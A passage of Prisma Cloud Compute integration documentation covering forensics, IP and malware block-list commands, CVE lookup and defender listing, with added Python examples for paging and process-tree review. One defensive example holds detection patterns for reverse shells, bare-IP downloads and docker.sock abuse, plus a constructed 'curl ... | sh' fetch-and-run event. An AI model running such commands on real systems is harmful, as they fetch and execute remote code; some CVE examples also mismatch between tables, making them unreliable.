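    "image": "twistlock/private:defender_21_04_439",
    "state": "active",
    "hostPid": True,
    "hostNetwork": True,
    "capabilities": {"ci": True},
    "remainingLearningDurationSec": -1,
    "processes": {"behavioral": [
        {"ppath": "/usr/bin/apt-get", "path": "/usr/lib/apt/methods/gpgv", "command": "gpgv"},
    ]},
}


def _benign(i: int) -> dict[str, Any]:
    """Constructed filler profile with nothing to flag."""
    return {"_id": f"container{i}", "image": "example/web:1.0", "state": "active",
            "hostPid": False, "hostNetwork": False, "capabilities": {},
            "remainingLearningDurationSec": -1, "processes": {"behavioral": []}}


SAMPLE_PROFILES: list[dict[str, Any]] = [DEFENDER_PROFILE] + [_benign(i) for i in range(1, 120)]


def make_fake_backend(profiles: list[dict[str, Any]]) -> tuple[RunCommand, list[dict[str, Any]]]:
    """Fake run_command that slices `profiles` the way the real command pages; records each call."""
    calls: list[dict[str, Any]] = []

    def run_command(name: str, args: dict[str, Any]) -> list[dict[str, Any]]:
        calls.append(dict(args))
        if not 1 <= args["limit"] <= PAGE_MAX:
            raise ValueError("limit must be between 1 and 50")
        return profiles[args["offset"]: args["offset"] + args["limit"]]

    return run_command, calls


if __name__ == "__main__":
    run, calls = make_fake_backend(SAMPLE_PROFILES)
    print(flagged_profiles(run), f"({len(calls)} pages fetched)")
```

Against the 120 constructed profiles the iterator issues three calls (offsets 0, 50 and 100) and only container123 is flagged. Passing a `filters` dict such as `{"state": "learning"}` narrows the query server-side using the arguments in the input table.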

prisma-cloud-compute-profile-container-hosts-list#


Get the hosts where a specific container is running.

Base Command#

prisma-cloud-compute-profile-container-hosts-list

Requires Role#

devSecOps

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| id | Container profile ID. Can be retrieved from the prisma-cloud-compute-profile-container-list command. | Required |
| limit | The maximum number of hosts to return. Must be between 1-50. Default is 50. | Optional |
| offset | The offset by which to begin listing hosts of the container. Default is 0. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.ProfileContainerHost.containerID | String | The container ID. |
| PrismaCloudCompute.ProfileContainerHost.hostsIDs | String | The list of hosts where this container is running. |

Command Example#

!prisma-cloud-compute-profile-container-hosts-list id=container123

Context Example#

```json
{
  "PrismaCloudCompute": {
    "ProfileContainerHost": {
      "containerID": "container123",
      "hostsIDs": [
        "host1",
        "host2"
      ]
    }
  }
}
```

Human Readable Output#

Hosts#

| HostsIDs |
| --- |
| host1, host2 |

prisma-cloud-compute-profile-container-forensic-list#


Get runtime forensics data for a specific container on a specific host.

Base Command#

prisma-cloud-compute-profile-container-forensic-list

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| id | The container ID. Can be retrieved from the prisma-cloud-compute-profile-container-list command. | Required |
| collections | The collections scoping the query. | Optional |
| hostname | The hostname for which data should be fetched. | Required |
| incident_id | The incident ID, in case the request type is an incident. | Optional |
| limit | The maximum number of forensics data records to return. Must be between 1-50. Default is 20. | Optional |
| offset | The offset by which to begin listing records. Default is 0. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.ContainerForensic.containerID | String | The container ID. |
| PrismaCloudCompute.ContainerForensic.hostname | String | The hostname. |
| PrismaCloudCompute.ContainerForensic.Forensics.allPorts | Boolean | Whether all listening ports are allowed. |
| PrismaCloudCompute.ContainerForensic.Forensics.attack | String | The event attack type. |
| PrismaCloudCompute.ContainerForensic.Forensics.category | String | The incident category. |
| PrismaCloudCompute.ContainerForensic.Forensics.command | String | The event command. |
| PrismaCloudCompute.ContainerForensic.Forensics.containerId | String | The event container ID. |
| PrismaCloudCompute.ContainerForensic.Forensics.dstIP | String | The destination IP address of the connection. |
| PrismaCloudCompute.ContainerForensic.Forensics.dstPort | String | The destination port. |
| PrismaCloudCompute.ContainerForensic.Forensics.dstProfileID | String | The profile ID of the connection destination. |
| PrismaCloudCompute.ContainerForensic.Forensics.effect | String | The runtime audit effect. |
| PrismaCloudCompute.ContainerForensic.Forensics.listeningStartTime | Date | The port listening start time. |
| PrismaCloudCompute.ContainerForensic.Forensics.message | String | The runtime audit message. |
| PrismaCloudCompute.ContainerForensic.Forensics.networkCollectionType | String | The type of the network collection method. |
| PrismaCloudCompute.ContainerForensic.Forensics.outbound | Boolean | Whether the port is outbound. |
| PrismaCloudCompute.ContainerForensic.Forensics.path | String | The event path. |
| PrismaCloudCompute.ContainerForensic.Forensics.pid | Number | The event process ID. |
| PrismaCloudCompute.ContainerForensic.Forensics.port | Number | The listening port. |
| PrismaCloudCompute.ContainerForensic.Forensics.ppid | Number | The event parent process ID. |
| PrismaCloudCompute.ContainerForensic.Forensics.process | String | The event process description. |
| PrismaCloudCompute.ContainerForensic.Forensics.srcIP | String | The source IP address of the connection. |
| PrismaCloudCompute.ContainerForensic.Forensics.srcProfileID | String | The profile ID of the connection source. |
| PrismaCloudCompute.ContainerForensic.Forensics.static | Boolean | Whether the event was added to the profile without behavioral indications. |
| PrismaCloudCompute.ContainerForensic.Forensics.type | String | The event type. |
| PrismaCloudCompute.ContainerForensic.Forensics.timestamp | Date | The event timestamp. |
| PrismaCloudCompute.ContainerForensic.Forensics.user | String | The event user. |

Command Example#

!prisma-cloud-compute-profile-container-forensic-list id=container123 hostname=host123 limit=2

Context Example#

```json
{
  "PrismaCloudCompute": {
    "ContainerForensic": {
      "Forensics": [
        {
          "containerId": "a6f769dd",
          "timestamp": "December 10, 2021 11:49:50 AM",
          "pid": 1341,
          "listeningStartTime": "January 01, 0001 00:00:00 AM",
          "command": "mongodump --out=/var/lib/twistlock-backup/dump",
          "user": "twistlock",
          "path": "/usr/bin/mongodump",
          "ppid": 15816,
          "type": "Process spawned"
        },
        {
          "containerId": "a6f769dd",
          "timestamp": "December 09, 2021 11:49:22 AM",
          "pid": 20891,
          "listeningStartTime": "January 01, 0001 00:00:00 AM",
          "command": "mongodump --out=/var/lib/twistlock-backup/dump",
          "user": "twistlock",
          "path": "/usr/bin/mongodump",
          "ppid": 15816,
          "type": "Process spawned"
        }
      ],
      "containerID": "container123",
      "hostname": "host123"
    }
  }
}
```

Human Readable Output#

Containers forensic report#

| Type | Path | User | Pid | ContainerId | Timestamp | Command |
| --- | --- | --- | --- | --- | --- | --- |
| Process spawned | /usr/bin/mongodump | twistlock | 1341 | a6f769dd | December 10, 2021 11:49:50 AM | mongodump --out=/var/lib/twistlock-backup/dump |
| Process spawned | /usr/bin/mongodump | twistlock | 20891 | a6f769dd | December 09, 2021 11:49:22 AM | mongodump --out=/var/lib/twistlock-backup/dump |
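Forensic records are flat, one row per event, so the parent/child relationships and the recurring-versus-first-seen distinction have to be rebuilt by the analyst. The following is an added example, not code from the integration, and it serves both this command and prisma-cloud-compute-host-forensic-list below, since both return Forensics records carrying pid, ppid, path, command, user and type. It rebuilds the process tree from pid/ppid, renders the ancestry chain of any event, separates commands seen once from commands that recur, and runs a small regex list over the command field. The sample events are constructed: the two mongodump records copy the context example above, the cron chain mirrors the host forensic example (with a parent bash record added so the chain resolves), and the curl|sh record is invented to show what a hit looks like. The regex list is an assumption, a starting point rather than Prisma Cloud's own detection logic.

```python
"""Process-tree and pattern review over Prisma Cloud Compute forensic records (added example)."""
from __future__ import annotations

import re
from collections import Counter, defaultdict
from typing import Any

# Assumed starting patterns for post-exploitation activity; tune to your environment.
SUSPICIOUS_PATTERNS = [re.compile(p) for p in (
    r"\b(curl|wget)\b.*https?://\d{1,3}(\.\d{1,3}){3}",  # fetch from a bare IP address
    r"\bbase64\s+(-d|--decode)\b",                       # decoding an embedded payload
    r"/dev/tcp/",                                        # bash reverse-shell idiom
    r"\bchmod\s+\+x\s+/(tmp|dev/shm)/",                  # making a dropped file executable
    r"docker\.sock",                                     # host control through the Docker API
)]

# Constructed sample (see the lead-in for which records are copied and which are invented).
SAMPLE_EVENTS: list[dict[str, Any]] = [
    {"pid": 1341, "ppid": 15816, "path": "/usr/bin/mongodump", "user": "twistlock",
     "command": "mongodump --out=/var/lib/twistlock-backup/dump", "type": "Process spawned"},
    {"pid": 20891, "ppid": 15816, "path": "/usr/bin/mongodump", "user": "twistlock",
     "command": "mongodump --out=/var/lib/twistlock-backup/dump", "type": "Process spawned"},
    {"pid": 17475, "ppid": 17470, "path": "/bin/bash", "user": "cakeagent",
     "command": "bash /opt/agent/disk.sh", "type": "Process spawned"},
    {"pid": 17476, "ppid": 17475, "path": "/bin/df", "user": "cakeagent",
     "command": "df -H -P -B G", "type": "Process spawned"},
    {"pid": 17477, "ppid": 17475, "path": "/bin/grep", "user": "cakeagent",
     "command": "grep -vE ^Filesystem|tmpfs|cdrom", "type": "Process spawned"},
    {"pid": 17478, "ppid": 17475, "path": "/usr/bin/gawk", "user": "cakeagent",
     "command": 'awk { printf $3 "|" $2 "|" $1 ":"}', "type": "Process spawned"},
    {"pid": 18001, "ppid": 17475, "path": "/bin/sh", "user": "cakeagent",
     "command": "sh -c curl -s http://198.51.100.9/p.sh | sh", "type": "Process spawned"},
]


def children(events: list[dict[str, Any]]) -> dict[int, list[dict[str, Any]]]:
    """Map each parent pid to the events it spawned."""
    tree: dict[int, list[dict[str, Any]]] = defaultdict(list)
    for event in events:
        tree[event["ppid"]].append(event)
    return tree


def ancestry(events: list[dict[str, Any]], pid: int) -> list[str]:
    """Binary paths from the oldest ancestor present in `events` down to `pid`.

    Parents outside the returned window (for example pid 15816 above) are simply
    absent, so the chain starts at the first known process.
    """
    index = {e["pid"]: e for e in events}
    chain: list[str] = []
    seen: set[int] = set()
    current = pid
    while current in index and current not in seen:  # `seen` guards against pid reuse loops
        seen.add(current)
        chain.append(index[current]["path"])
        current = index[current]["ppid"]
    chain.reverse()
    return chain


def first_seen(events: list[dict[str, Any]]) -> list[dict[str, Any]]:
    """Events whose (path, command) pair occurs only once in the window: the ones to read first."""
    counts = Counter((e["path"], e["command"]) for e in events)
    return [e for e in events if counts[(e["path"], e["command"])] == 1]


def suspicious(events: list[dict[str, Any]]) -> list[dict[str, Any]]:
    """Events whose command matches any of SUSPICIOUS_PATTERNS."""
    return [e for e in events if any(p.search(e.get("command", "")) for p in SUSPICIOUS_PATTERNS)]


def report(events: list[dict[str, Any]]) -> list[dict[str, Any]]:
    """One row per suspicious event, with its user and rendered ancestry chain."""
    return [{"pid": e["pid"], "user": e["user"], "command": e["command"],
             "chain": " -> ".join(ancestry(events, e["pid"]))} for e in suspicious(events)]


if __name__ == "__main__":
    for row in report(SAMPLE_EVENTS):
        print(f"{row['user']:>10} {row['chain']:<24} {row['command']}")
```

On the sample, the recurring mongodump pair drops out of `first_seen` while the whole cron chain stays in, and `report` returns only the constructed curl|sh event with the chain `/bin/bash -> /bin/sh`. In an automation, pass the Forensics list from either context key and raise `limit`/advance `offset` to widen the window before trusting the recurrence counts.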

prisma-cloud-compute-host-forensic-list#


Get forensics on a specific host.

Base Command#

prisma-cloud-compute-host-forensic-list

Requires Role#

devSecOps

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| id | The host ID. Can be retrieved from the prisma-cloud-compute-profile-host-list command. | Required |
| collections | The collections scoping the query. | Optional |
| incident_id | The incident ID, in case the request type is an incident. | Optional |
| limit | The maximum number of forensics data records to return. Must be between 1-50. Default is 20. | Optional |
| offset | The offset by which to begin listing host forensics. Default is 0. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.HostForensic.Forensics.app | String | The application associated with the event. |
| PrismaCloudCompute.HostForensic.Forensics.attack | String | The event attack type. |
| PrismaCloudCompute.HostForensic.Forensics.category | String | The incident category. |
| PrismaCloudCompute.HostForensic.Forensics.command | String | The event command. |
| PrismaCloudCompute.HostForensic.Forensics.country | String | The country associated with the event. |
| PrismaCloudCompute.HostForensic.Forensics.effect | String | The runtime audit effect. |
| PrismaCloudCompute.HostForensic.Forensics.interactive | Boolean | Whether the event is interactive. |
| PrismaCloudCompute.HostForensic.Forensics.ip | String | The IP address associated with the event. |
| PrismaCloudCompute.HostForensic.Forensics.listeningStartTime | Date | The listening port start time. |
| PrismaCloudCompute.HostForensic.Forensics.message | String | The runtime audit message. |
| PrismaCloudCompute.HostForensic.Forensics.path | String | The event path. |
| PrismaCloudCompute.HostForensic.Forensics.pid | Number | The event process ID. |
| PrismaCloudCompute.HostForensic.Forensics.port | Number | The listening port. |
| PrismaCloudCompute.HostForensic.Forensics.ppath | String | The event parent path. |
| PrismaCloudCompute.HostForensic.Forensics.ppid | Number | The event parent process ID. |
| PrismaCloudCompute.HostForensic.Forensics.process | String | The event process. |
| PrismaCloudCompute.HostForensic.Forensics.timestamp | Date | The event timestamp. |
| PrismaCloudCompute.HostForensic.Forensics.type | String | The event type. |
| PrismaCloudCompute.HostForensic.Forensics.user | String | The event user. |
| PrismaCloudCompute.HostForensic.hostID | String | The host ID that was analyzed. |

Command Example#

!prisma-cloud-compute-host-forensic-list id=hostname123 limit=3 offset=5

Context Example#

{
"PrismaCloudCompute": {
"HostForensic": {
"Forensics": [
{
"ppath": "/bin/bash",
"timestamp": "December 10, 2021 21:36:03 PM",
"app": "cron",
"pid": 17478,
"listeningStartTime": "January 01, 0001 00:00:00 AM",
"command": "awk { printf $3 \"|\" $2 \"|\" $1 \":\"}",
"user": "cakeagent",
"path": "/usr/bin/gawk",
"ppid": 17475,
"type": "Process spawned",
"interactive": true
},
{
"ppath": "/bin/bash",
"timestamp": "December 10, 2021 21:36:03 PM",
"app": "cron",
"pid": 17477,
"listeningStartTime": "January 01, 0001 00:00:00 AM",
"command": "grep -vE ^Filesystem|tmpfs|cdrom",
"user": "cakeagent",
"path": "/bin/grep",
"ppid": 17475,
"type": "Process spawned",
"interactive": true
},
{
"ppath": "/bin/bash",
"timestamp": "December 10, 2021 21:36:03 PM",
"app": "cron",
"pid": 17476,
"listeningStartTime": "January 01, 0001 00:00:00 AM",
"command": "df -H -P -B G",
"user": "cakeagent",
"path": "/bin/df",
"ppid": 17475,
"type": "Process spawned",
"interactive": true
}
],
"hostID": "hostname123"
}
}
}

Human Readable Output#

Host forensics report#

| Type | Path | User | Pid | Timestamp | Command | App |
| --- | --- | --- | --- | --- | --- | --- |
| Process spawned | /usr/bin/gawk | cakeagent | 17411 | December 10, 2021 21:34:03 PM | awk {gsub("%", "%%", $0);printf $1 "\|" $2 "\|" $3 "\|" $4 "\|" $5 "\|" $6 "\|" $11 ":::"} | cron |
| Process spawned | /bin/ps | cakeagent | 17410 | December 10, 2021 21:34:03 PM | ps aux | cron |
| Process spawned | /bin/grep | cakeagent | 17407 | December 10, 2021 21:34:03 PM | grep -vE ^Filesystem\|tmpfs\|cdrom | cron |
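The command above returns at most 50 records per call and pages with `limit` and `offset`, and each record carries `pid`/`ppid`, so a complete picture of a host needs the caller to page and then relate the events. The following is an added example, not code from the Prisma Cloud Compute integration: it assumes a fetch callable with the same (host id, limit, offset) parameters as `prisma-cloud-compute-host-forensic-list`, stands it in with `stub_fetch` over constructed records modelled on the context example, and rebuilds the spawn tree under the cron-launched shell.

```python
"""Page through host forensic records and rebuild the process-spawn tree.

Added example; this is not code from the Prisma Cloud Compute integration. It
assumes a fetch callable with the same (host id, limit, offset) parameters as
prisma-cloud-compute-host-forensic-list; stub_fetch below stands in for that
call and serves constructed records so the script runs offline.
"""
from collections import defaultdict
from typing import Callable, Dict, List

MAX_LIMIT = 50  # the command's limit argument must be between 1 and 50

# Constructed sample records, shaped like the Forensics entries in the context example.
SAMPLE_RECORDS: List[dict] = [
    {"pid": 17475, "ppid": 17400, "ppath": "/usr/sbin/cron", "path": "/bin/bash",
     "command": "/bin/bash /opt/agent/collect.sh", "user": "cakeagent", "app": "cron",
     "type": "Process spawned", "interactive": False},
    {"pid": 17476, "ppid": 17475, "ppath": "/bin/bash", "path": "/bin/df",
     "command": "df -H -P -B G", "user": "cakeagent", "app": "cron",
     "type": "Process spawned", "interactive": True},
    {"pid": 17477, "ppid": 17475, "ppath": "/bin/bash", "path": "/bin/grep",
     "command": "grep -vE ^Filesystem|tmpfs|cdrom", "user": "cakeagent", "app": "cron",
     "type": "Process spawned", "interactive": True},
    {"pid": 17478, "ppid": 17475, "ppath": "/bin/bash", "path": "/usr/bin/gawk",
     "command": 'awk { printf $3 "|" $2 "|" $1 ":"}', "user": "cakeagent", "app": "cron",
     "type": "Process spawned", "interactive": True},
    {"pid": 18001, "ppid": 1, "path": "/usr/sbin/sshd", "command": "sshd: -D",
     "user": "root", "app": "sshd", "type": "Listening port", "port": 22},
]

FetchFn = Callable[[str, int, int], List[dict]]


def stub_fetch(host_id: str, limit: int, offset: int) -> List[dict]:
    """Stand-in for the command call: slices the constructed records like a paged API."""
    return SAMPLE_RECORDS[offset:offset + limit]


def fetch_all_forensics(fetch: FetchFn, host_id: str, page_size: int = MAX_LIMIT) -> List[dict]:
    """Walk limit/offset pages until a short page signals the end of the data."""
    if not 1 <= page_size <= MAX_LIMIT:
        raise ValueError(f"limit must be between 1 and {MAX_LIMIT}, got {page_size}")
    records: List[dict] = []
    offset = 0
    while True:
        page = fetch(host_id, page_size, offset)
        records.extend(page)
        if len(page) < page_size:
            return records
        offset += page_size


def spawn_tree(records: List[dict]) -> Dict[int, List[int]]:
    """Map each parent PID to the PIDs it spawned, using only 'Process spawned' events."""
    children: Dict[int, List[int]] = defaultdict(list)
    for rec in records:
        if rec.get("type") == "Process spawned":
            children[rec["ppid"]].append(rec["pid"])
    return {ppid: sorted(pids) for ppid, pids in children.items()}


def render_tree(records: List[dict], root_pid: int) -> List[str]:
    """Render the spawn tree below root_pid as indented 'pid user command' lines."""
    by_pid = {rec["pid"]: rec for rec in records}
    children = spawn_tree(records)

    def walk(pid: int, depth: int) -> List[str]:
        rec = by_pid.get(pid)
        label = f"{rec['user']} {rec['command']}" if rec else "(not in result set)"
        lines = ["  " * depth + f"{pid} {label}"]
        for child in children.get(pid, []):
            lines.extend(walk(child, depth + 1))
        return lines

    return walk(root_pid, 0)


if __name__ == "__main__":
    all_records = fetch_all_forensics(stub_fetch, "hostname123", page_size=2)
    print(f"fetched {len(all_records)} records")
    print("\n".join(render_tree(all_records, 17475)))
```

A parent that appears only as a `ppid` (here 17400, the cron daemon) is rendered as "(not in result set)" rather than dropped, which makes a truncated or filtered result set visible in the tree instead of silently flattening it.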

prisma-cloud-compute-console-version-info#


Get the console version.

Base Command#

prisma-cloud-compute-console-version-info

Requires Role#

ci

Input#

There are no input arguments for this command.

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.Console.Version | String | The console version. |

Command Example#

!prisma-cloud-compute-console-version-info

Context Example#

{
"PrismaCloudCompute": {
"Console": {
"Version": "21.04.439"
}
}
}

Human Readable Output#

Console version#

| Version |
| --- |
| 21.04.439 |

prisma-cloud-compute-custom-feeds-ip-list#


Get all the blacklisted IP addresses in the system.

Base Command#

prisma-cloud-compute-custom-feeds-ip-list

Requires Role#

auditor

Input#

There are no input arguments for this command.

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.CustomFeedIP.digest | String | An internal digest of the custom IP feed. |
| PrismaCloudCompute.CustomFeedIP.feed | String | The list of blacklisted custom IP addresses. |
| PrismaCloudCompute.CustomFeedIP.modified | Date | The last time the custom feed was modified. |

Command Example#

!prisma-cloud-compute-custom-feeds-ip-list

Context Example#

{
"PrismaCloudCompute": {
"CustomFeedIP": {
"feed": [
"2.2.2.2",
"1.1.1.1"
],
"modified": "December 10, 2021 21:12:32 PM",
"digest": "12345"
}
}
}

Human Readable Output#

IP Feeds#

| Modified | Feed |
| --- | --- |
| December 10, 2021 21:12:32 PM | 2.2.2.2, 1.1.1.1 |

prisma-cloud-compute-custom-feeds-ip-add#


Add a list of banned IP addresses to be blocked by the system.

Base Command#

prisma-cloud-compute-custom-feeds-ip-add

Requires Role#

operator

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| ip | List of custom IP addresses to add to the banned IPs list that will be blocked. For example ip=1.1.1.1,2.2.2.2. | Required |

Context Output#

There is no context output for this command.

Command Example#

!prisma-cloud-compute-custom-feeds-ip-add ip=1.1.1.1,2.2.2.2

Human Readable Output#

Successfully updated the custom IP feeds

prisma-cloud-compute-custom-feeds-ip-remove#


Remove a list of IPs from the system's block list.

Base Command#

prisma-cloud-compute-custom-feeds-ip-remove

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| ip | A comma-separated list of custom IP addresses to remove from the banned IPs list. For example ip=1.1.1.1,2.2.2.2. | Required |

Context Output#

There is no context output for this command.

Command example#

!prisma-cloud-compute-custom-feeds-ip-remove ip=2.2.2.2,5.6.7.8

Human Readable Output#

Successfully removed {'2.2.2.2'} from the custom IP feeds. Could not find {'5.6.7.8'} in the custom IP feeds.
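Both feed commands take one comma-separated `ip` argument, and the remove output above shows the set semantics: addresses that were present are removed, addresses that were not are reported separately. The following is an added example, not code from the Prisma Cloud Compute integration: it validates the argument with the standard `ipaddress` module before anything touches the block list and models the console feed as a set of address strings, with the messages rendered from sorted lists so they are deterministic.

```python
"""Validate the ip argument of the custom IP feed commands and model add/remove.

Added example; not code from the Prisma Cloud Compute integration. It assumes the
comma-separated argument format shown for prisma-cloud-compute-custom-feeds-ip-add
and -remove (ip=1.1.1.1,2.2.2.2) and models the console's feed as a set of address
strings; the result messages follow the human readable output above, with the
addresses rendered as sorted lists so the text is deterministic.
"""
import ipaddress
from typing import List, Set, Tuple


def parse_ip_argument(raw: str) -> List[str]:
    """Split the argument, trim whitespace, normalize each address and drop duplicates.

    Raises ValueError on an empty list or on any token that is not an IPv4/IPv6
    address, so a typo never reaches the block list half-applied.
    """
    seen: Set[str] = set()
    result: List[str] = []
    for item in raw.split(","):
        token = item.strip()
        if not token:
            continue
        try:
            canonical = str(ipaddress.ip_address(token))
        except ValueError as exc:
            raise ValueError(f"{token!r} is not a valid IP address") from exc
        if canonical not in seen:
            seen.add(canonical)
            result.append(canonical)
    if not result:
        raise ValueError("the ip argument must contain at least one address")
    return result


def check_ip_argument(raw: str) -> Tuple[bool, str]:
    """Return (ok, message) without raising, for argument-validation paths."""
    try:
        parse_ip_argument(raw)
    except ValueError as exc:
        return False, str(exc)
    return True, ""


def add_to_feed(feed: Set[str], raw: str) -> Tuple[Set[str], str]:
    """Union the new addresses into the feed; adding an address twice is harmless."""
    updated = feed | set(parse_ip_argument(raw))
    return updated, "Successfully updated the custom IP feeds"


def remove_from_feed(feed: Set[str], raw: str) -> Tuple[Set[str], str]:
    """Remove what is present and report what was not, mirroring the command's output."""
    wanted = set(parse_ip_argument(raw))
    removed = wanted & feed
    missing = wanted - feed
    parts: List[str] = []
    if removed:
        parts.append(f"Successfully removed {sorted(removed)} from the custom IP feeds.")
    if missing:
        parts.append(f"Could not find {sorted(missing)} in the custom IP feeds.")
    return feed - removed, " ".join(parts)


if __name__ == "__main__":
    feed: Set[str] = set()
    feed, msg = add_to_feed(feed, "1.1.1.1,2.2.2.2")
    print(msg, sorted(feed))
    feed, msg = remove_from_feed(feed, "2.2.2.2,5.6.7.8")
    print(msg, sorted(feed))
```

Validating before the call matters because the add command is an operator-role change to what the system blocks; rejecting the whole argument on one malformed token is preferable to silently applying part of it.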

prisma-cloud-compute-custom-feeds-malware-list#


List all custom-uploaded MD5 malware hashes.

Base Command#

prisma-cloud-compute-custom-feeds-malware-list

Requires Role#

auditor

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| limit | The maximum number of records of custom md5 malwares to return. Default is 50. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.CustomFeedMalware.digest | String | An internal digest of the feed. |
| PrismaCloudCompute.CustomFeedMalware.feed.md5 | String | The md5 sum of the feed. |
| PrismaCloudCompute.CustomFeedMalware.feed.modified | Date | The time the malware was added to the database. |
| PrismaCloudCompute.CustomFeedMalware.feed.name | String | The name of the malware feed. |
| PrismaCloudCompute.CustomFeedMalware.modified | Date | The last time the custom feed was modified. |

Command Example#

!prisma-cloud-compute-custom-feeds-malware-list limit=2

Context Example#

{
"PrismaCloudCompute": {
"CustomFeedMalware": {
"feed": [
{
"md5": "md5_hash1",
"name": "first_md5_hash",
"allowed": false
},
{
"md5": "md5_hash2",
"name": "second_md5_hash",
"allowed": false
}
],
"modified": "December 09, 2021 13:31:38 PM",
"digest": "1234"
}
}
}

Human Readable Output#

Malware Feeds#

| Name | Md5 | Allowed |
| --- | --- | --- |
| first_md5_hash | md5_hash1 | false |
| second_md5_hash | md5_hash2 | false |

prisma-cloud-compute-custom-feeds-malware-add#


Add custom md5 malware hashes.

Base Command#

prisma-cloud-compute-custom-feeds-malware-add

Requires Role#

operator

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| name | The name that will be attached to the md5 records. | Required |
| md5 | Comma-separated list of md5 hashes to be added. | Required |

Context Output#

There is no context output for this command.

Command Example#

!prisma-cloud-compute-custom-feeds-malware-add name=test md5=md5_hash1,md5_hash2,md5_hash3

Human Readable Output#

Successfully updated the custom md5 malware feeds

cve#


Get information about the CVEs in the system. Returns a maximum of 50 records. You can query a partial CVE identifier, such as cve-2020 or cve-2014, or filter by severity, distro, or package.

Base Command#

cve

Requires Role#

devOps

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| cve | Comma-separated list of CVEs, for example, cve=cve-2016-223,cve-2020-3546. | Required |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| CVE.ID | String | The ID of the CVE, for example: CVE-2015-1653 |
| CVE.CVSS | String | The CVSS of the CVE, for example: 10.0 |
| CVE.Modified | Date | The timestamp of when the CVE was last modified. |
| CVE.Description | String | A description of the CVE. |
| DBotScore.Indicator | String | The indicator value. |
| DBotScore.Score | Number | The indicator score. |
| DBotScore.Type | String | The indicator type. |
| DBotScore.Vendor | String | The vendor reporting the score of the indicator. |
| DBotScore.Reliability | String | Reliability of the source providing the intelligence data. |

Command Example#

!cve cve=CVE-2021-4333

Context Example#

{
"DBotScore": [
{
"Vendor": "PaloAltoNetworks_PrismaCloudCompute",
"Indicator": "CVE-2021-43332",
"Score": 0,
"Type": "cve"
},
{
"Vendor": "PaloAltoNetworks_PrismaCloudCompute",
"Indicator": "CVE-2021-43337",
"Score": 0,
"Type": "cve"
}
],
"CVE": [
{
"ID": "CVE-2021-43331",
"CVSS": 6.1,
"Modified": "November 17, 2021 16:40:14 PM",
"Description": "In GNU Mailman before 2.1.36, a crafted URL to the Cgi/options.py user options page can execute arbitrary JavaScript for XSS."
},
{
"ID": "CVE-2021-43337",
"CVSS": 6.5,
"Modified": "November 18, 2021 08:40:01 AM",
"Description": "SchedMD Slurm 21.08.* before 21.08.4 has Incorrect Access Control. On sites using the new AccountingStoreFlags=job_script and/or job_env options, the access control rules in SlurmDBD may permit users to request job scripts and environment files to which they should not have access."
}
]
}

Human Readable Output#

CVE-2021-43332#

| CVSS | Description | ID | Modified |
| --- | --- | --- | --- |
| 6.1 | In GNU Mailman before 2.1.36, the CSRF token for the Cgi/admindb.py admindb page contains an encrypted version of the list admin password. This could potentially be cracked by a moderator via an offline brute-force attack. | CVE-2021-43332 | November 19, 2021 08:40:01 AM |

CVE-2021-43337#

| CVSS | Description | ID | Modified |
| --- | --- | --- | --- |
| 6.5 | SchedMD Slurm 21.08.* before 21.08.4 has Incorrect Access Control. On sites using the new AccountingStoreFlags=job_script and/or job_env options, the access control rules in SlurmDBD may permit users to request job scripts and environment files to which they should not have access. | CVE-2021-43337 | November 18, 2021 08:40:01 AM |

prisma-cloud-compute-defenders-list#


Retrieve a list of defenders and their information.

Base Command#

prisma-cloud-compute-defenders-list

Requires Role#

vulnerabilityManager

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| cluster | The cluster name by which to scope the query. | Optional |
| hostname | Name of a specific defender to retrieve. Can be retrieved from !prisma-cloud-compute-profile-host-list. | Optional |
| type | The defender types to return (for example, docker, dockerWindows, cri). | Optional |
| connected | Whether to return only connected defenders (true) or only disconnected defenders (false). Possible values are: true, false. | Optional |
| limit | The maximum number of defender records to return. Default is 20. | Optional |
| offset | The offset number by which to begin listing defenders and their information. Default is 0. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.DefenderDetails.category | String | The category of the defender type (host/container/serverless). Range of acceptable values: container, host, serverless, appEmbedded. |
| PrismaCloudCompute.DefenderDetails.certificateExpiration | Date | The client's certificate expiry time. |
| PrismaCloudCompute.DefenderDetails.cloudMetadata | Unknown | The cloud provider metadata of the host. |
| PrismaCloudCompute.DefenderDetails.cluster | String | The provided cluster name. (Fallback is internal IP address.) |
| PrismaCloudCompute.DefenderDetails.clusterID | String | The unique ID generated for each daemon set and used to group defenders by clusters. Note: Kubernetes does not provide a cluster name as part of its API. |
| PrismaCloudCompute.DefenderDetails.compatibleVersion | Boolean | Whether the defender has a compatible version for communication (for example, request logs). |
| PrismaCloudCompute.DefenderDetails.connected | Boolean | Whether the defender is connected. |
| PrismaCloudCompute.DefenderDetails.features | Unknown | The features that are enabled in the defender, such as listener type. |
| PrismaCloudCompute.DefenderDetails.firewallProtection | Unknown | The firewall protection status of app embedded defenders. |
| PrismaCloudCompute.DefenderDetails.fqdn | String | The fully qualified domain name used in audit alerts to identify specific hosts. |
| PrismaCloudCompute.DefenderDetails.hostname | String | The defender hostname. |
| PrismaCloudCompute.DefenderDetails.lastModified | Date | The last time the defender connectivity was modified. |
| PrismaCloudCompute.DefenderDetails.port | Number | The communication port between the defender and the console. |
| PrismaCloudCompute.DefenderDetails.proxy | Unknown | The proxy options of the defender. |
| PrismaCloudCompute.DefenderDetails.remoteLoggingSupported | Boolean | Whether the defender logs can be retrieved remotely. |
| PrismaCloudCompute.DefenderDetails.remoteMgmtSupported | Boolean | Whether the defender can be remotely managed (upgrade, restart). |
| PrismaCloudCompute.DefenderDetails.status | Unknown | The feature status of the defender. |
